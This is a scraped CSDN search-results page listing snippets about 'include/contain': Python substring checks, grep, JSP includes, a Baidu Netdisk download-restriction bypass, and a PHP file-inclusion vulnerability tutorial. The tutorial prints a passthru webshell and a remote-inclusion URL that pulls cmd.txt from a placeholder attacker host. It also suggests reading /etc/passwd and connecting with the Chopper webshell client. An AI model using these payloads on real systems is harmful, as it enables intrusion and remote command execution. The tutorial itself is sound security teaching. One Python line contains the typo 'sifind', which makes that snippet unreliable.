精华内容
下载资源
问答
  • 包含19门课程

    2020-07-20 18:19:08
    包含19门课程
  • Python判断字符串是否包含子字符串

    万次阅读 2019-04-10 15:36:20
    Python如何判断一个字符串是否包含指定字符串?本文介绍Python判断一个字符串是否包含指定子串的4种方法。具有一定的借鉴价值。 第一种 使用in运算符 最简单的方法是通过python的 in 运算符 str = "Everyone has...

    Python如何判断一个字符串是否包含指定字符串?本文介绍Python判断一个字符串是否包含指定子串的4种方法。具有一定的借鉴价值。

    第一种 使用in运算符

    最简单的方法是通过python的 in 运算符

    str = "Everyone has a world, quite and lonely!"
    
    result = "world" in str 
    result2 = "hello" in str
    
    print(result,result2)

    运行结果:

    True False

    当字符串中存在子字符串时,结果返回True,否则,返回false。

    这种方法非常简单,常用。

    第二种 使用字符串对象的find()/rfind()、index()/rindex()、和count()方法

    字符串属性的自带方法

    s = "Everyone has a world, quite and lonely!"
    t = "hello"
    t1 = "world"
    
    print(s.find(t)>=0,s.find(t1)>=0)
    print(s.count(t)>=0,s.count(t1)>=0)
    print(s.index(t1)>=0)

    运行结果:

    False True
    False True
    True

    第三种:使用string模块的find()/rfind()方法

    还可以使用的另一种方法是字符串的find方法。与被计算为布尔值的in运算符不同,find方法返回一个整数。

    如果子字符串存在,则此整数本质上是子字符串开头的索引,否则返回-1。

    import string
    
    s = "Everyone has a world, quite and lonely!"
    
    print(s.find('world'),sifind('hello'))
    
    运行结果:
    
    15 -1

    这个方法的一个很厉害的地方:可以指定一个开始索引和一个结束索引来限制你的搜索范围。

    import string
    
    s = "Everyone has a world, quite and lonely!"
    
    print(s.find('world',5,25),sifind('world',0,5))
    
    运行结果:
    
    15 -1

    第四种:使用string模块的index()/rindex()方法

    index()/rindex()方法跟find()/rfind()方法相似,只不过在找不到子字符串的时候会报一个ValueError的异常。

     


     

     

    展开全文
  • 在下载百度网盘时,有些文件会被提示“您下载的内容包含违规信息”。这个时候直接使用百度网盘已经下载不了,只能使用别的软件和工具。 网上的大神破了一个版本的百度网盘,原理类似pandownload过去绕开百度的限制,...

    在下载百度网盘时,有些文件会被提示“您下载的内容包含违规信息”。这个时候直接使用百度网盘已经下载不了,只能使用别的软件和工具。

    网上的大神破了一个版本的百度网盘,原理类似pandownload过去绕开百度的限制,只要下载这个版本就能下载网盘严禁下载的文件了。

    https://top3china.com/?p=75

    展开全文
  • linux中查找包含指定内容的文件

    万次阅读 2018-03-14 15:08:01
    为了防止自己记不住,也方便自己查找,特此记录在博客中查找包含指定内容的文件就是用grep这个命令grep 'name' -r / grep '指定内容' -r 目录上述命令就是在根目录下递归查找包含name内容的文件 -r 递归查找文件 -e ...

    为了防止自己记不住,也方便自己查找,特此记录在博客中

    查找包含指定内容的文件就是用grep这个命令

    grep 'name' -r /

    grep '指定内容' -r 目录

    上述命令就是在根目录下递归查找包含name内容的文件

        -r 递归查找文件

        -e 从文件内容查找与正则表达式匹配的行

        –i 查时不区分大小写

        -c 查找匹配的行数

        -v 从文件内容查找不匹配指定字符串的行

     

    从根目录开始查找所有扩展名为.log的文本文件,并找出包含”ERROR”的行

    find / -type f -name “*.log” | xargs grep “ERROR” 

    例子:从当前目录开始查找所有扩展名为.in的文本文件,并找出包含”thermcontact”的行

    find . -name “*.in” | xargs grep “thermcontact”

     

    欢迎关注我的公众号

    参考:

     

    http://blog.csdn.net/jiajunlee/article/details/50470643

    http://blog.csdn.net/zubin006/article/details/4879553

    展开全文
  • 文件包含漏洞

    千次阅读 多人点赞 2018-09-23 18:53:31
    目录 文件包含漏洞成因 为什么要包含文件? 如何利用这个漏洞? 本地包含 ...远程包含 ...文件包含漏洞的防御 ...文件包含漏洞成因 ...服务器通过函数去包含任意文件时,由于要包含的这个文件来源过滤...

    目录

    文件包含漏洞成因

    为什么要包含文件?

    如何利用这个漏洞?

    本地包含

    远程包含

    文件包含漏洞的防御


    文件包含漏洞成因

    文件包含漏洞是代码注入的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务器端执行,代码注入的典型代表就是文件包含File inclusion。文件包含可能会出现在jsp、php、asp等语言中。但是asp、jsp文件只能本地包含,而php既可以本地包含也可以远程包含。服务器通过函数去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。常见的文件包含的函数如下
    PHP:include() 、include_once()、require()、require_once()、fopen()、readfile()
    JSP/Servlet:ava.io.file()、java.io.filereader()
    ASP:include file、include virtual

    • Include:包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。
    • Require:跟include唯一不同的是,当产生错误时候,include会继续运行而require停止运行。
    • Include_once:这个函数跟include函数作用几乎相同,只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。
    • Require_once:这个函数跟require函数作用几乎相同,与include_once和include类似。
    • php.ini配置文件:allow_url_fopen=off 即不可以包含远程文件。php4存在远程包含&本地包含,php5仅存在本地包含。

    使用上面几个函数包含文件时,该文件将作为PHP代码执行,PHP内核并不在意被包含的文件是什么类型的。也就是说我们用这几个函数包含.jpg文件时,也会将其当做php文件来执行。

    为什么要包含文件?

    程序员写程序的时候,不喜欢干同样的事情,也不喜欢把同样的代码(比如一些公用的函数)写几次,于是就把需要公用的代码写在一个单独的文件里面,比如 share.php,而后在其它文件需要使用时进行包含调用。在php里,我们就是使用上面列举的那几个函数来达到这个目的的,它的工作流程:如果你想在 main.php里包含share.php,我将这样写 include("share.php") ,然后就可以使用share.php中的函数了,像这个写死需要包含的文件名称的自然没有什么问题,也不会出现漏洞,那么问题到底是出在哪里呢?

    有的时候可能并不能确定需要包含哪个文件,比如看下面的代码

    if ($_GET[page]) {
        include $_GET[page];
    } else {
        include "home.php";
    }

    上面这段代码的使用格式可能是这样的:
    http://hi.baidu.com/m4r10/php/index.php?page=main.php

    1、提交上面这个URL,在index.php中就取得这个page的值($_GET[page])。
    2、判断$_GET[page]是不是空,若不空(这里是main.php)就用include来包含这个文件。
    3、若$_GET[page]空的话就执行else,来 include "home.php" 这个文件。

    你也许要说,这样很好呀,可以按照URL来动态包含文件,多么方便呀,怎么产生漏洞的呢?问题的答案是:我们不乖巧,我们
    总喜欢和别人不一样,我们不会按照他的链接来操作,我们可能想自己写想包含(调用)的文件。比如下面说的!

    如何利用这个漏洞?

    本地包含(LFI)

    本地包含条件:

    1. allow_url_fopen=On 
    2. 用户可以动态控制变量

    针对以上代码,比如我们会随便的写入下面这个URL:http: //hi.baidu.com/m4r10/php/index.php?page=hello.php。然后我们的index.php程序就傻傻按照上面我们说得步骤去执行:取page为hello.php,然后去include(hello.php)。。。。这时问题出现了,因为我们并没有hello.php这个文件,所以它 include的时候就会报警告,类似下列信息:

    Quote:
    Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.phpon line 3
    Warning: include() [function.include]: Failed opening hello.php for inclusion (include_path=.:) in /vhost/wwwroot/php/index.php on line 3

    第一行的那个Warning就是找不到我们指定的hello.php文件,也就是包含不到我们指定路径的文件;
    而第二行的警告是因为前面没有找到指定文件,所以包含的时候就出警告了。

    通过报错,我们可以得知绝对路径 /vhost/wwwroot/php/
    我们可以多次探测来包含其他文件,比如指定 www.xxx.com/index.php?test=./123.txt,来读出当前路径下的123.txt,也可以使用../来进行目录跳转(在没过滤../的情况下),也可以直接指定绝对路径,读取敏感的系统文件 ,比如 www.xxx.com/index.php?test=/etc/passwd,如果目标主机没有对权限限制的很严格,或者启动Apache的权限比较高,是可以读出这个文件内容的。否则就会得到一个类似于:open_basedir restriction in effect. 的 Warning。
    如果我们可以上传文件的话,我们可以上传一句话木马,然后再包含一句话木马,再用菜刀连接拿下网站的Webshell

    本地文件包含漏洞利用技巧

    • 包含用户上传的文件 (我们上传的一句话木马等等)
    • 包含data:// 或 php://input 等伪协议
    • 包含 Session 文件
    • 包含日志文件      ( 通过构造语句让服务器报错并将一句话随报错信息写入日志;找到日志文件路径,包含此文件;用菜刀连接;拿下网站的Webshell )

    远程包含(RFI)

    远程包含条件:

    1. allow_url_include=On
    2. 用户可以动态控制变量

    我们可以指定其他URL上的一个我们写的一句话木马,然后用菜刀连接获取Webshell。

    我们还可以指定其它URL上的一个包含PHP代码的webshell来直接运行,比如,我先写一段运行命令的PHP代码,如下保存为cmd.txt(后缀不重要,只要内容为PHP格式就可以了)。

    if (get_magic_quotes_gpc())
    {$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} //去掉转义字符(可去掉字符串中的反斜线字符)
    ini_set("max_execution_time",0); //设定针对这个文件的执行时间,0为不限制.
    echo "开始行";       //打印的返回的开始行提示信息
    passthru($_REQUEST["cmd"]);   //运行cmd指定的命令
    echo "结束行";       //打印的返回的结束行提示信息
    ?>

    以上这个文件的作用就是接受cmd指定的命令,并调用passthru函数执行,把内容返回在开始行与结束行之间。把这个文件保存到我们主机的服务器上(可以是不支持PHP的主机),只要能通过HTTP访问到就可以了,例如地址如下:http://www.xxx.cn/cmd.txt,然后我们就可以在那个漏洞主机上构造如下URL来利用了:http://hi.baidu.com/m4r10/php/index.php?page=http: //www.xxx.cn/cmd.txt?cmd=ls,其中cmd后面的就是你需要执行的命令,其它常用的命令(以*UNIX为例)如下:

    • ll 列目录、文件(相当于Windows下dir)
    • pwd 查看当前绝对路径
    • whoami 查看当前用户
    • wget 下载指定URL的文件

    文件包含漏洞的防御

    在php中,文件包含需要配置 allow_url_include=On(远程文件包含)、allow_url_fopen=On(本地文件包含) 。所以,我们可以将其关闭,这样就可以杜绝文件包含漏洞了。但是,某些情况下,不能将其关闭,必须进行包含的话,我们可以使用白名单过滤的方法,只能包含我们指定的文件。这样,就可以杜绝文件包含漏洞了。

    相关链接:DVWA之File Inclusion(文件包含)   

                      原创干货 | ​文件包含漏洞——原理与利用

                      文件上传漏洞

                      文件解析漏洞

    展开全文
  • 文件包含

    千次阅读 2018-01-12 09:28:47
    文件包含原理 文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置...
  • 静态包含和动态包含的区别

    千次阅读 2018-05-26 23:03:11
    2)参数传递不同静态包含不能向被包含页面传递参数动态包含可以使用jsp:param标签向被包含页面传递参数3)原理不同静态包含: 先合并再翻译动态包含: 先翻译再合并1.静态包含是在转换之前把包含的文件合在一起,...
  • Pandas 过滤dataframe中包含特定字符串的数据

    万次阅读 多人点赞 2018-08-30 22:33:21
    假如有一列全是字符串的dataframe,希望提取包含特定字符的所有数据,该如何提取呢? 因为之前尝试使用filter,发现行不通,最终找到这个行得通的方法。 举例说明: 我希望提取所有包含'Mr.'的人名 1、首先将...
  • 正则表达式匹配:包含且不包含

    万次阅读 2016-10-11 18:05:08
    参考:http://www.jb51.net/article/52491.htm http://www.cnblogs.com/yirlin/archive/2006/04/12/373222.html例:包含admin且不包含abc。 ^((?!abc).)*$ 查资料知道:(?!pattern) 负向预查,在任何不匹配 ...
  • 包含

    千次阅读 2017-09-16 16:39:16
    包含是指在组件重用时不需要包含其他的可重用组件。 例如Web Service就是自包含组件,即它不需要依赖其他组件。 Web Services自包含模块化的应用程序,也就是说它本身含有,不需要依赖其他程序. 再例: 对头文件...
  • 只是解决头文件重复包含的问题的,但是头文件嵌套包含,就不代表不会出问题,就会关系错综复杂,出现标识符未定义,重定义等错误。(具体的错误和举例,自己百度搜索吧) 所以C语言头文件包含原则如下:(头文件...
  • 【文件包含】文件包含漏洞知识总结

    千次阅读 多人点赞 2019-06-28 08:38:41
    【文件包含】文件包含漏洞知识总结 Hello,各位小伙伴周五好~ 这里是你们的劳模小编~ 之前一期,我们已经一起总结了文件上传和文件解析漏洞。 今天我们就一起来看看文件包含漏洞吧~ 一、什么是文件包含漏洞? 1、...
  • js 包含

    千次阅读 2019-09-03 12:44:16
    字符串的包含 var str = "北方天气好"; console.log(str.indexOf("北") != -1 ); // true indexOf() 方法可返回某个指定的字符串值在字符串中首次出现的位置。如果要检索的字符串值没有出现,则该方法返回 -1...
  • 最新Android4.0API源代码 包含所有API

    千次下载 热门讨论 2011-11-16 16:38:26
    之前上传的(http://download.csdn.net/detail/michael__li/3797623)有网友反应有部分API没有包含,这次是修复好了,包含所有的API,最完整的Android4.0 API 源代码。 下载的压缩包里有使用方法,下载后在Eclipse里...
  • 静态包含是通过JSP的include指令包含页面,动态包含是通过JSP标准动作<jsp:include>包含页面。 静态包含是编译时包含,如果包含的页面不存在则会产生编译错误,而且两个页面的"contentType"...
  • java判断字符串是否包含某个字符(串)

    万次阅读 多人点赞 2018-07-28 18:38:18
    判断一个字符串是否包含某个子串的n种方法 startsWith() contains方法 indexOf方法 startsWith() 这个方法有两个变体并测试如果一个字符串开头的指定索引指定的前缀或在默认情况下从字符串开...
  • python 正则表达式解决包含且不包含某字符串的问题 本测试使用python的re.compile与re.search作为方法测试包含error不包含abc的实例 python简单正则里只介绍到了不包含某字符的正则:[^1-9a-z],[^abc]也...
  • 文件包含漏洞概述 1.定义:文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行时执行的...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,404,342
精华内容 561,736
关键字:

包含